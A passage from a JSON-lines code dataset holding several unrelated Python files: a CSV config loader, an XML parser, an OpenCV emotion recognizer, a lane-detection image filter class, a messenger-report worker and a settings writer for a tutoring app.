auth_request('GET','/key/54c079837fa0572d1ed6946d/'+ value['id'],)\n\t\tresp = response.json()\n","sub_path":"get_key.py","file_name":"get_key.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"74252245","text":"## read the paramters\n\n## process\n\n## return the data frame\n\nimport os\nimport yaml\nimport pandas as pd\nimport argparse\n\n\n# checking\n\ndef read_params(config_path):\n with open(config_path) as f:\n config = yaml.safe_load(f)\n return config\n\n\ndef get_base_dir():\n base = os.getcwd()\n base = base[::-1]\n idx = base.find(\"\\\\\")\n base = base[idx:]\n base = base[::-1]\n return base\n\n\ndef get_data(config_path):\n config = read_params(config_path)\n data_path = config[\"data_source\"][\"s3_source\"]\n # base=get_base_dir()\n df = pd.read_csv(os.path.join(data_path))\n print(df.head())\n return df\n\n\nif __name__ == \"__main__\":\n args = argparse.ArgumentParser()\n args.add_argument(\"--config\", default=\"params.yaml\")\n parsed_args = args.parse_args()\n get_data(parsed_args.config)\n","sub_path":"src/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"463568000","text":"#!/usr/bin/python3\n\nimport xml.etree.ElementTree as ET\n\nprint('Fetching info from xml...', end='\\r')\nresult_list = list()\ntree = ET.parse('../data/Deputados.xml')\nroot = tree.getroot()[0]\n\nfor congressman in root:\n if congressman[1].text == '54' and congressman[7].text == 'Efetivado':\n result_list.append(congressman[2].text)\nprint('Fetching data from xml... Done')\n\nprint('List of congressman:')\nfor congressman in result_list:\n print(congressman)\n","sub_path":"src/find_holders.py","file_name":"find_holders.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"330508678","text":"import sys\nimport time\nimport operator\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\n\nfrom Trainer import *\nfrom config import *\nfrom Sampler import *\n\n# Recognising is the third stage of the program\n# It creates a recogniser\n# Trains it with the classified emotions from the data set\n# Then predict the current emotion in the video\n\nclass Recognizer(object):\n\n def __init__(self, threshold=THRESHOLD, retrain_flag=True, recogniser='Fisher'):\n self._emotion_dictionary = emotions\n self._face_cascade = cv2.CascadeClassifier(CASCADE_FACE)\n self._mouth_cascade = cv2.CascadeClassifier(CASCADE_MOUTH)\n self._threshold = threshold\n self._retrain_flag = retrain_flag\n self._trainer = Trainer(recogniser)\n self._sampler = Sampler()\n\n def __call__(self):\n # Prediction on Video\n recogniser = self._trainer.get_recognizer(self._retrain_flag)\n capture = cv2.VideoCapture(0)\n start = time.time()\n time.clock()\n disp_major_emotion = []\n disp_minor_emotion = []\n cache = list(dict())\n cache_emop = []\n\n logging.info(cache)\n\n while True:\n ret, color_frame = capture.read()\n results = self._sampler.extract(color_frame)\n\n for i, (gray_resize, x, y) in enumerate(results):\n prediction, confidence = recogniser.predict(gray_resize)\n emotion = self._emotion_dictionary[prediction]\n\n # Added multiple user record space for their emotion\n while len(disp_major_emotion) <= i:\n disp_major_emotion.append('neutral')\n disp_minor_emotion.append('')\n\n # Added multiple user emotion cache\n while len(cache) <= i:\n cache.append({'neutral': 0})\n\n # Display emotion every second\n if time.time() - start >= 1:\n if i == 0:\n cache_emop = []\n\n logging.info('cache has %s', cache)\n # Fetch Emotion Ranking\n sorted_emotion = sorted(cache[i].items(), key=operator.itemgetter(1), reverse=True)\n var_emotion = np.var(cache[i].values())\n\n # Check if the emotion can be recognised or not\n if var_emotion >= THRESHOLD or var_emotion == 0:\n disp_major_emotion[i] = sorted_emotion[0][0]\n else:\n disp_major_emotion[i] = '???'\n\n # Check if the minor emotion should be the major guess\n if var_emotion < THRESHOLD and var_emotion != 0:\n disp_minor_emotion[i] = sorted_emotion[0][0] + '?'\n elif len(sorted_emotion) > 1 and sorted_emotion[1][1] > 0:\n disp_minor_emotion[i] = sorted_emotion[1][0] + '?'\n else:\n disp_minor_emotion[i] = ''\n\n major_text_color = (0, 0, 255)\n minor_text_color = (50, 50, 150)\n text_font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(color_frame, str(disp_major_emotion[i]), (x, y), text_font, 1, major_text_color, 3)\n cv2.putText(color_frame, str(disp_minor_emotion[i]), (x, y - 40), text_font, 0.8, minor_text_color, 2)\n\n if i == len(results) - 1:\n cache = list(dict())\n\n start = time.time()\n else:\n # print \"pic %s analysis Emotion: %10s | Confidence: %10f\" % (i, disp_emotion[i], confidence)\n if cache[i].get(emotion, None) is None:\n cache[i][emotion] = pow((16000 - confidence) // 1000, 2)\n else:\n cache[i][emotion] += pow((16000 - confidence) // 1000, 2)\n\n for i in range(len(results)):\n major_text_color = (0, 0, 255)\n minor_text_color = (50, 50, 150)\n text_font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(color_frame, str(disp_major_emotion[i]), (x, y), text_font, 1, major_text_color, 3)\n cv2.putText(color_frame, str(disp_minor_emotion[i]), (x, y - 40), text_font, 0.8, minor_text_color, 2)\n\n cv2.imshow('face', color_frame)\n k = cv2.waitKey(10) & 0xff\n if k == 27:\n capture.release()\n cv2.destroyAllWindows()\n return 0\n\nif __name__ == '__main__':\n # rt_flag = False\n rt_flag = False\n if len(sys.argv) == 2:\n rt_flag = False if sys.argv[1] == '0' else True\n\n rec = Recognizer(recogniser='Eigen', retrain_flag=rt_flag)\n rec()\n","sub_path":"Recogniser.py","file_name":"Recogniser.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"431930950","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 14 04:49:06 2020\n\n@author: Dr~Newt\n\"\"\"\nimport numpy as np\nimport cv2\nimport math\nimport glob\nfrom utils5.camera_calib import Camera_Calib\n\nclass ImageFilters():\n # Initialize ImageFilter\n def __init__(self, cam_Calib, debug=False):\n self.current_Frame = None\n # returns a copy of the camera calibration data\n self.mtx, self.dist, self.img_size = cam_Calib.get()\n # normal image size\n self.x, self.y = self.img_size\n self.mid = self.mid = int(self.y / 2)\n # current Image RGB - undistorted\n self.current_Image = np.zeros((self.y, self.x, 3), dtype=np.float32)\n # current Image Top half RGB\n self.current_SkyRGB = np.zeros((self.mid, self.x, 3), dtype=np.float32)\n # current Image Bottom half RGB\n self.current_RoadRGB = np.zeros((self.mid, self.x, 3), dtype=np.float32)\n # current Sky Luma Image\n self.current_SkyL = np.zeros((self.mid, self.x), dtype=np.float32)\n # current Road Luma Image\n self.current_RoadL = np.zeros((self.mid, self.x), dtype=np.float32)\n \n # current Edge (Left Only)\n self.current_Road_L_Edge = np.zeros((self.mid, self.x), dtype=np.uint8)\n self.curRoadLEdgeProjected = np.zeros((self.y, self.x, 3), dtype=np.uint8)\n \n self.debug = debug\n \n self.skylrgb = np.zeros((4), dtype=np.float32)\n self.roadlrgb = np.zeros((4), dtype=np.float32)\n self.roadbalance = 0.0\n self.horizonFound = False\n self.roadhorizon = 0\n self.visibility = 0\n \n\n # Textural Image Info\n self.skyText = 'NOIMAGE'\n self.skyImageQ = 'NOIMAGE'\n self.roadText = 'NOIMAGE'\n self.roadImageQ = 'NOIMAGE'\n \n def dir_sobel(self, gray_img, kernel_size=3, thres=(0, np.pi/2)):\n \"\"\"\n Computes sobel matrix in both x and y directions, gets their absolute values to find the direction of the gradient\n and applies a threshold value to only set pixels within the specified range\n \"\"\"\n sx_abs = np.absolute(cv2.Sobel(gray_img, cv2.CV_64F, 1, 0, ksize=kernel_size))\n sy_abs = np.absolute(cv2.Sobel(gray_img, cv2.CV_64F, 0, 1, ksize=kernel_size))\n \n dir_sxy = np.arctan2(sx_abs, sy_abs)\n \n binary_output = np.zeros_like(dir_sxy)\n binary_output[(dir_sxy >= thres[0]) & (dir_sxy <= thres[1])] = 1\n \n return binary_output\n \n \n def abs_sobel(self,gray_img, x_dir=True, kernel_size=3, thres=(0, 255)):\n \"\"\"\n Applies the sobel operator to a grayscale-like (i.e. single channel) image in either horizontal or vertical direction\n The function also computes the asbolute value of the resulting matrix and applies a binary threshold\n \"\"\"\n sobel = cv2.Sobel(gray_img, cv2.CV_64F, 1, 0, ksize=kernel_size) if x_dir else cv2.Sobel(gray_img, cv2.CV_64F, 0, 1, ksize=kernel_size) \n sobel_abs = np.absolute(sobel)\n sobel_scaled = np.uint8(255 * sobel / np.max(sobel_abs))\n \n gradient_mask = np.zeros_like(sobel_scaled)\n gradient_mask[(thres[0] <= sobel_scaled) & (sobel_scaled <= thres[1])] = 1\n return gradient_mask\n \n \n def to_hls(self,img):\n #Returns the same image in HLS format\n return cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n \n def compute_hls_white_yellow_binary(self,rgb_img):\n #Returns a binary thresholded image produced retaining only white and yellow elements \n hls_img = self.to_hls(rgb_img)\n \n # Compute a binary thresholded image where yellow is isolated from HLS components\n img_hls_yellow_bin = np.zeros_like(hls_img[:,:,0])\n img_hls_yellow_bin[((hls_img[:,:,0] >= 15) & (hls_img[:,:,0] <= 35))\n & ((hls_img[:,:,1] >= 30) & (hls_img[:,:,1] <= 204))\n & ((hls_img[:,:,2] >= 115) & (hls_img[:,:,2] <= 255)) \n ] = 1\n \n # Compute a binary thresholded image where white is isolated from HLS components\n img_hls_white_bin = np.zeros_like(hls_img[:,:,0])\n img_hls_white_bin[((hls_img[:,:,0] >= 0) & (hls_img[:,:,0] <= 255))\n & ((hls_img[:,:,1] >= 200) & (hls_img[:,:,1] <= 255))\n & ((hls_img[:,:,2] >= 0) & (hls_img[:,:,2] <= 255)) \n ] = 1\n \n # Now combine both\n img_hls_white_yellow_bin = np.zeros_like(hls_img[:,:,0])\n img_hls_white_yellow_bin[(img_hls_yellow_bin == 1) | (img_hls_white_bin == 1)] = 1\n \n return img_hls_white_yellow_bin\n \n def mag_sobel(self,gray_img, kernel_size=3, thres=(0, 255)):\n #Computes sobel matrix in both x and y directions, merges them by computing the magnitude in both directions\n #and applies a threshold value to only set pixels within the specified range\n sx = cv2.Sobel(gray_img, cv2.CV_64F, 1, 0, ksize=kernel_size)\n sy = cv2.Sobel(gray_img, cv2.CV_64F, 0, 1, ksize=kernel_size)\n \n sxy = np.sqrt(np.square(sx) + np.square(sy))\n scaled_sxy = np.uint8(255 * sxy / np.max(sxy))\n \n sxy_binary = np.zeros_like(scaled_sxy)\n sxy_binary[(scaled_sxy >= thres[0]) & (scaled_sxy <= thres[1])] = 1\n \n return sxy_binary\n \n \n \n def combined_sobels(self,sx_binary, sy_binary, sxy_magnitude_binary, gray_img, kernel_size=3, angle_thres=(0, np.pi/2)):\n\n sxy_direction_binary = self.dir_sobel(gray_img, kernel_size=kernel_size, thres=angle_thres)\n\n combined = np.zeros_like(sxy_direction_binary)\n # Sobel X returned the best output so we keep all of its results. We perform a binary and on all the other sobels \n combined[(sx_binary == 1) | ((sy_binary == 1) & (sxy_magnitude_binary == 1) & (sxy_direction_binary == 1))] = 1\n \n return combined\n \n def ToLab(self, img):#Returns the same image in LAB format\n return cv2.cvtColor(img, cv2.COLOR_RGB2LAB)\n \n def GreenFilter(self):\n \n undist_test_img_gray = self.ToLab(self.current_RoadRGB)[:,:,0]\n \n undistorted_yellow_white_hls_img_bin = self.compute_hls_white_yellow_binary(self.current_RoadRGB)\n \n sobx_best = self.abs_sobel(undist_test_img_gray, kernel_size=15, thres=(20, 120))\n \n # Saving our best sobel y result\n soby_best = self.abs_sobel(undist_test_img_gray, x_dir=False, kernel_size=15, thres=(20, 120))\n sobxy_best = self.mag_sobel(undist_test_img_gray, kernel_size=15, thres=(80, 200))\n \n sobel_combined_best = self.combined_sobels(sobx_best, soby_best, sobxy_best, undist_test_img_gray, kernel_size=15, angle_thres=(np.pi/4, np.pi/2)) \n\n color_binary = np.dstack((np.zeros_like(sobel_combined_best), sobel_combined_best, undistorted_yellow_white_hls_img_bin)) * 255\n color_binary = color_binary.astype(np.uint8)\n \n combined_binary = np.zeros_like(undistorted_yellow_white_hls_img_bin)\n combined_binary[(sobel_combined_best == 1) | (undistorted_yellow_white_hls_img_bin == 1)] = 1\n \n return color_binary,combined_binary\n\n\n def image_Quality(self, img):\n \n self.current_Image = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n self.yuv = cv2.cvtColor(self.current_Image, cv2.COLOR_RGB2YUV)\n \n # Computes stats for the sky image\n \n self.current_SkyL = self.yuv[0:self.mid, :, 0]\n self.current_SkyRGB[0:self.mid, : ] = self.current_Image[0:self.mid, : ]\n self.skylrgb[0] = np.average(self.current_SkyL[0:self.mid, :])\n self.skylrgb[1] = np.average(self.current_SkyRGB[0:self.mid, :, 0])\n self.skylrgb[2] = np.average(self.current_SkyRGB[0:self.mid, :, 1])\n self.skylrgb[3] = np.average(self.current_SkyRGB[0:self.mid, :, 2])\n \n # Computes stats for the road image\n self.current_RoadL = self.yuv[self.mid:self.y, :, 0]\n self.current_RoadRGB[:,:] = self.current_Image[self.mid:self.y, :]\n self.roadlrgb[0] = np.average(self.current_RoadL[0:self.mid, :])\n self.roadlrgb[1] = np.average(self.current_RoadRGB[0:self.mid, :, 0])\n self.roadlrgb[2] = np.average(self.current_RoadRGB[0:self.mid, :, 1])\n self.roadlrgb[3] = np.average(self.current_RoadRGB[0:self.mid, :, 2])\n # cv2.imshow(\"testing \", self.current_RoadRGB)\n # cv2.waitKey(0)\n # Sky image condition\n if self.skylrgb[0] > 160:\n self.skyImageQ = 'The Sky is : overexposed'\n elif self.skylrgb[0] < 50:\n self.skyImageQ = 'The Sky is : underexposed'\n elif self.skylrgb[0] > 143:\n self.skyImageQ = 'The Sky is : normal bright'\n elif self.skylrgb[0] < 113:\n self.skyImageQ = 'The Sky is : normal dark'\n else:\n self.skyImageQ = 'The Sky is : normal'\n\n # Sky detected weather or lighting conditions\n if self.skylrgb[0] > 128:\n if self.skylrgb[3] > self.skylrgb[0]:\n if self.skylrgb[1] > 120 and self.skylrgb[2] > 120:\n if (self.skylrgb[2] - self.skylrgb[1]) > 20.0:\n self.skyText = 'Sky Condition: tree shaded'\n else:\n self.skyText = 'Sky Condition: cloudy'\n else:\n self.skyText = 'Sky Condition: clear'\n else:\n self.skyText = 'Sky Condition: UNKNOWN SKYL>128'\n else:\n if self.skylrgb[2] > self.skylrgb[3]:\n self.skyText = 'Sky Condition: surrounded by trees'\n self.visibility = -80\n elif self.skylrgb[3] > self.skylrgb[0]:\n if (self.skylrgb[2] - self.skylrgb[1]) > 10.0:\n self.skyText = 'Sky Condition: tree shaded'\n else:\n self.skyText = \\\n 'Sky Condition: very cloudy or under overpass'\n else:\n self.skyText = 'Sky Condition: UNKNOWN!'\n\n self.roadbalance = self.roadlrgb[0] / 10.0\n\n # Detemines the conditions of the road \n if self.roadlrgb[0] > 160:\n self.roadImageQ = 'Road Image: overexposed'\n elif self.roadlrgb[0] < 50:\n self.roadImageQ = 'Road Image: underexposed'\n elif self.roadlrgb[0] > 143:\n self.roadImageQ = 'Road Image: normal bright'\n elif self.roadlrgb[0] < 113:\n self.roadImageQ = 'Road Image: normal dark'\n else:\n self.roadImageQ = 'Road Image: normal'\n\n def Background_sub(self, imgs):\n img = cv2.cvtColor(imgs, cv2.COLOR_BGR2GRAY)\n img = cv2.resize(img ,(self.x, self.y), None)\n res = cv2.createBackgroundSubtractorMOG2()\n return cv2.bitwise_or(res.apply(img) , img)\n \n ## Define a function to masks out yellow lane lines\n def image_only_yellow_white(self, img):\n # setup inRange to mask off everything except white and yellow\n lower_yellow_white = np.array([140, 140, 64])\n upper_yellow_white = np.array([255, 255, 255])\n mask = cv2.inRange(img, lower_yellow_white, upper_yellow_white)\n self.all_yellow = cv2.bitwise_and(img, img, mask=mask)\n\n \n\n # Define a function that applies Sobel x or y, then takes an absolute value and applies a threshold.\n def abs_sobel_thresh(self, img, orient='x', thresh=(40, 255)):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n if orient == 'x':\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)\n abs_sobel = np.absolute(sobelx)\n if orient == 'y':\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1)\n abs_sobel = np.absolute(sobely)\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))# Rescale back to 8 bit integer\n # Create a copy and apply the threshold\n ret, binary_output = cv2.threshold(scaled_sobel, thresh[0], thresh[1], cv2.THRESH_BINARY)\n return binary_output\n\n # Define a function that applies Sobel x and y,then computes the magnitude of the gradient and applies a threshold\n def mag_thresh(self, img, sobel_kernel=3, mag_thresh=(40, 255)):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n scale_factor = np.max(gradmag)/255\n gradmag = (gradmag/scale_factor).astype(np.uint8)\n ret, mag_binary = cv2.threshold(gradmag, mag_thresh[0], mag_thresh[1], cv2.THRESH_BINARY)\n return mag_binary\n\n # Define a function that applies Sobel x and y, then computes the direction of the gradient and applies a threshold.\n def dir_threshold(self, img, sobel_kernel=3, thresh=(0, np.pi/2)):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n with np.errstate(divide='ignore', invalid='ignore'):\n dirout = np.absolute(np.arctan(sobely/sobelx))\n # 5) Create a binary mask where direction thresholds are met\n dir_binary = np.zeros_like(dirout).astype(np.float32)\n dir_binary[(dirout > thresh[0]) & (dirout < thresh[1])] = 1\n # 6) Return this mask as your binary_output image\n # update nan to number\n np.nan_to_num(dir_binary)\n # make it fit\n dir_binary[(dir_binary>0)|(dir_binary<0)] = 128\n return dir_binary.astype(np.uint8)\n\n # Define a function that thresholds the S-channel of HLS\n def hls_s(self, img, thresh=(0, 255)):\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n s = hls[:,:,2]\n retval, s_binary = cv2.threshold(s.astype('uint8'), thresh[0], thresh[1], cv2.THRESH_BINARY)\n return s_binary\n\n # Define a function that thresholds the H-channel of HLS\n def hls_h(self, img, thresh=(0, 255)):\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n h = hls[:,:,0]\n retval, h_binary = cv2.threshold(h.astype('uint8'), thresh[0], thresh[1], cv2.THRESH_BINARY)\n return h_binary\n \n \n def thresholding(self,img):\n \n img_to_gray = cv2.cvtColor(img ,cv2.COLOR_BGR2GRAY)#makes image gray\n kernel = np.ones((5,5))\n img_g_blur = cv2.GaussianBlur(img_to_gray, (5, 5),0)\n img_current_RoadEdge = cv2.Canny(img_g_blur, 50, 150 )\n white_yellow ,white,yellow = self.Color_filter(img)\n img_current_RoadEdge_yellow = cv2.Canny(white_yellow, 50, 150 )\n #dial and erode are irrelevant but improves the results a little\n img_dial = cv2.dilate(img_current_RoadEdge,kernel,iterations=1)\n img_erode = cv2.erode(img_dial,kernel,iterations=1)\n to_procees = cv2.Canny(white_yellow, 50, 100)\n combined_img = cv2.bitwise_or(to_procees, img_erode)\n \n return combined_img,img_current_RoadEdge_yellow,white_yellow\n \n def Color_filter(self, img):\n hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n \n # Range for lower red\n red_lower = np.array([0,120,70])\n red_upper = np.array([10,255,255])\n mask_red1 = cv2.inRange(hsv, red_lower, red_upper)\n # Range for upper range\n red_lower = np.array([170,120,70])\n red_upper = np.array([180,255,255])\n mask_red2 = cv2.inRange(hsv, red_lower, red_upper)\n mask_red = mask_red1 + mask_red2\n \n \n # Range for upper range\n yellow_lower = np.array([20, 100, 100])\n yellow_upper = np.array([30, 255, 255])\n White_lower = np.array([0, 0, 200])\n White_upper = np.array([255, 255, 255])\n \n mask_yellow = cv2.inRange(hsv, yellow_lower, yellow_upper)\n mask_white = cv2.inRange(hsv,White_lower,White_upper)\n \n img_yellow = cv2.bitwise_and(img, img, mask=mask_yellow)\n img_white = cv2.bitwise_and(img, img, mask=mask_white)\n red_output = cv2.bitwise_and(img, img, mask=mask_red)\n \n red_ratio=(cv2.countNonZero(mask_red))/(img.size/3)\n yellow_ratio =(cv2.countNonZero(mask_yellow))/(img.size/3)\n white_ratio = (cv2.countNonZero(mask_white))/(img.size/3)\n \n Yellowinimage = np.round(yellow_ratio*100, 2)\n whiteinimage = np.round(white_ratio*100, 2)\n Redinimage = np.round(red_ratio*100, 2)\n \n white_yellow = cv2.bitwise_or(img_white, img_yellow)\n \n return white_yellow,img_white,img_yellow\n \n \n ################################## STILL TO TEST ############################\n # A function to cut the image in half horizontally\n def Half_Img(self, image, half=0):\n if half == 0:\n if len(image.shape) < 3:\n newimage = np.copy(image[self.mid:self.y, :])\n else:\n newimage = np.copy(image[self.mid:self.y, :, :])\n else:\n if len(image.shape) < 3:\n newimage = np.copy(image[0:self.mid, :])\n else:\n newimage = np.copy(image[0:self.mid, :, :])\n return newimage\n \n def miximg(self, img1, img2, α=0.8, β=1., λ=0.):\n return cv2.addWeighted(img1.astype(np.uint8),\n α, img2.astype(np.uint8), β, λ)\n \n \n def horizonDetect(self, debug=False, thresh=50):\n if not self.horizonFound:\n img = np.copy(self.current_RoadRGB).astype(np.uint8)\n magch = self.mag_thresh(img, sobel_kernel=9, mag_thresh=(30, 150))\n horizonLine = 50\n while not self.horizonFound and horizonLine < int(self.y / 2):\n magchlinesum = np.sum(magch[horizonLine:(horizonLine + 1), :]).astype(np.float32)\n \n if magchlinesum > (self.x * thresh):\n self.horizonFound = True\n self.roadhorizon = horizonLine + int(self.y / 2)\n else:\n horizonLine += 1\n\n def drawHorizon(self, image):\n horizonLine = self.roadhorizon\n image[horizonLine:(horizonLine + 1), :, 0] = 255\n image[horizonLine:(horizonLine + 1), :, 1] = 255\n image[horizonLine:(horizonLine + 1), :, 2] = 0\n\n def balanceEx(self):\n # separate each of the RGB color channels\n r = self.current_RoadRGB[:, :, 0]\n g = self.current_RoadRGB[:, :, 1]\n b = self.current_RoadRGB[:, :, 2]\n # Get the Y channel (Luma) from the YUV color space\n # and make two copies\n yo = np.copy(self.current_RoadL[:, :]).astype(np.float32)\n yc = np.copy(self.current_RoadL[:, :]).astype(np.float32)\n # use the balance factor calculated previously to calculate the\n # corrected Y\n yc = (yc / self.roadbalance) * 8.0\n # make a copy and threshold it to maximum value 255.\n lymask = np.copy(yc)\n lymask[(lymask > 255.0)] = 255.0\n # create another mask that attempts to masks yellow road markings.\n uymask = np.copy(yc) * 0\n # subtract the thresholded mask from the corrected Y.\n # Now we just have peaks.\n yc -= lymask\n # If we are dealing with an over exposed image\n # cap its corrected Y to 242.\n if self.roadlrgb[0] > 160:\n yc[(b > 254) & (g > 254) & (r > 254)] = 242.0\n # If we are dealing with a darker image\n # try to pickup faint blue and cap them to 242.\n elif self.roadlrgb[0] < 128:\n yc[(b > self.roadlrgb[3]) & (yo > 160 + (self.roadbalance * 20))] = 242.0\n else:\n yc[(b > self.roadlrgb[3]) & (yo > 210 + (self.roadbalance * 10))] = 242.0\n # attempt to mask yellow lane lines\n uymask[(b < self.roadlrgb[0]) & (r > self.roadlrgb[0]) & (g > self.roadlrgb[0])] = 242.0\n # combined the corrected road luma and the masked yellow\n yc = self.miximg(yc, uymask, 1.0, 1.0)\n # mix it back to the original luma.\n yc = self.miximg(yc, yo, 1.0, 0.8)\n # resize the image in an attempt to get the lane lines to the bottom.\n yc[int((self.y / 72) * 70):self.y, :] = 0\n self.yuv[self.mid:self.y, :, 0] = yc.astype(np.uint8)\n self.yuv[(self.y - 40):self.y, :, 0] = \\\n yo[(self.mid - 40):self.mid, :].astype(np.uint8)\n # convert back to RGB.\n self.current_RoadRGB = cv2.cvtColor(self.yuv[self.mid:self.y, :, :], cv2.COLOR_YUV2RGB)\n \n # def yellow_colorDetection(self , image):\n \n # hsv = cv2.cvtColor(image,cv2.COLOR_BGR2HSV)\n # '''Red'''\n # # Range for lower red\n # red_lower = np.array([0,120,70])\n # red_upper = np.array([10,255,255])\n # mask_red1 = cv2.inRange(hsv, red_lower, red_upper)\n # # Range for upper range\n # red_lower = np.array([170,120,70])\n # red_upper = np.array([180,255,255])\n # mask_red2 = cv2.inRange(hsv, red_lower, red_upper)\n # mask_red = mask_red1 + mask_red2\n # red_output = cv2.bitwise_and(image, image, mask=mask_red)\n # red_ratio=(cv2.countNonZero(mask_red))/(image.size/3)\n # print(\"Red in image\", np.round(red_ratio*100, 2))\n # '''yellow'''\n # # Range for upper range\n # yellow_lower = np.array([20, 100, 100])\n # yellow_upper = np.array([30, 255, 255])\n # mask_yellow = cv2.inRange(hsv, yellow_lower, yellow_upper)\n # yellow_output = cv2.bitwise_and(image, image, mask=mask_yellow)\n # yellow_ratio =(cv2.countNonZero(mask_yellow))/(image.size/3)\n # print(\"Yellow in image\", np.round(yellow_ratio*100, 2))\n \n # return yellow_output\n \n # A function to cut the image in half horizontally\n def Half_Img(self, image, half=0):\n if half == 0:\n if len(image.shape) < 3:\n newimage = np.copy(image[self.mid:self.y, :])\n else:\n newimage = np.copy(image[self.mid:self.y, :, :])\n else:\n if len(image.shape) < 3:\n newimage = np.copy(image[0:self.mid, :])\n else:\n newimage = np.copy(image[0:self.mid, :, :])\n return newimage\n \n ","sub_path":"utils5/image_Filter.py","file_name":"image_Filter.py","file_ext":"py","file_size_in_byte":22478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152571009","text":"import traceback\nimport ConfigParser\nimport requests\nimport json\nfrom datetime import datetime\nfrom pytz import timezone\nfrom time import sleep\nfrom messengers.messengers import MESSENGERS\nfrom helpers.analytic_helper import AnalyticHelper\nfrom helpers.log_helper import LogHelper\nfrom helpers.api_helper import APIHelper\n\n\nclass WorkerHelper(object):\n lh = LogHelper()\n api = APIHelper()\n\n def worker(self):\n \"\"\"Worker.\"\"\"\n while True:\n task = self.api.get_task()\n if task is not None:\n self.process_task(task)\n else:\n sleep(3)\n\n def process_task(self, task):\n \"\"\"Process the task.\"\"\"\n try:\n messenger = MESSENGERS[task[\"messenger\"]](task[\"login\"], task[\"password\"], task[\"_id\"], self.api.token, task.get(\"timezone_offset\", 0))\n if messenger.error:\n messenger.exit()\n else:\n messenger.chose_contact()\n if messenger.contact_id is None:\n messenger.exit()\n else: \n messages = messenger.get_messages(task[\"date_from\"], task[\"date_to\"])\n contact = messenger.get_contact()\n messenger.exit()\n report = AnalyticHelper(messages, task[\"date_from\"], task[\"date_to\"]).get_report()\n report[\"contact\"] = contact\n report[\"messenger\"] = task[\"messenger\"]\n report[\"report_id\"] = task[\"_id\"]\n report[\"user_id\"] = task[\"user_id\"]\n self.api.add_report(report)\n except:\n # self.lh.log(traceback.format_exc())\n self.lh.capture_exception()\n","sub_path":"worker/helpers/worker_helper.py","file_name":"worker_helper.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339239381","text":"import pprint, sys, shutil, os, openpyxl, json\n\nsys.path.append(os.path.join('..', 'app'))\nimport settings, functions\n\ndef getSettingsFromApp():\n courseNames = settings.courseNames\n tutorCourse = settings.tutorCourse\n scheduleFileName = settings.SCHEDULE_FILE_NAME\n\n return (tutorCourse, courseNames, scheduleFileName)\n\ndef writeSettingsTempFile(tutorCourse, courseNames, schedule, schedule_file_name):\n '''Write temporary settings file which will replace the settings file\n in the app\n '''\n fileObject = open('settingsTemp.py', 'w')\n fileObject.write('tutorCourse = ' + pprint.pformat(tutorCourse) + '\\n'*2)\n fileObject.write('courseNames = ' + pprint.pformat(courseNames) + '\\n'*2)\n fileObject.write('schedule = ' + pprint.pformat(schedule) + '\\n'*2)\n fileObject.write('SCHEDULE_FILE_NAME = ' + pprint.pformat(str(schedule_file_name)) + '\\n'*2)\n\n fileObject.close()\n\ndef writeSettingsFile():\n '''Write the settings file'''\n # Rewriting local settings.py file\n appPath = os.path.join('..', 'app')\n shutil.copy('settingsTemp.py', os.path.join(appPath, 'settings.py'))\n\ndef writeSettingsJson(tutorCourse, courseNames, schedule):\n with open('settings.json', 'w') as io:\n io.write('{\\n')\n io.write('\\\"schedule\\\" :' + json.dumps(schedule, sort_keys=True, indent=4) + ',\\n')\n io.write('\\\"tutorCourse\\\" :' + json.dumps(tutorCourse, sort_keys=True, indent=4) + ',\\n')\n io.write('\\\"courseNames\\\" :' + json.dumps(courseNames, sort_keys=True, indent=4) + '\\n')\n io.write('}')\n io.close()\n\ndef removeInstance(targetDictionary, choice):\n '''Removing instance choice from targetDictionary'''\n targetDictionary.pop(choice, None)\n\ndef removeCourse(tutorDictionary, tutorName, courseToRemove):\n tutorDictionary[tutorName].remove(courseToRemove)\n\ndef addCourse(courseDictionary, description, code):\n '''Adding new course instance with desciption and course code as arguments\n to the courseDictionary\n '''\n key = str(code + ': ' + description)\n value = str(code)\n\n courseDictionary.update({key:value})\n\ndef addNewTutor(tutorDictionary, tutorName):\n '''Adding new tutor into a dictionary'''\n tutorDictionary[str(tutorName)] = ['0']\n\n\ndef isAlreadyTutoring(course, tutorName, tutorDictionary):\n '''If course is in tutorDictionary under tutorName or 'Everyone' keys return True'''\n if course in tutorDictionary[tutorName] or course in tutorDictionary['Everyone']:\n return True\n else:\n return False\n\ndef getCoursesToAdd(tutorDictionary, courseDictionary, tutorName):\n '''Returns list of courses which may be added to a tutorName'''\n return sorted([course for course in 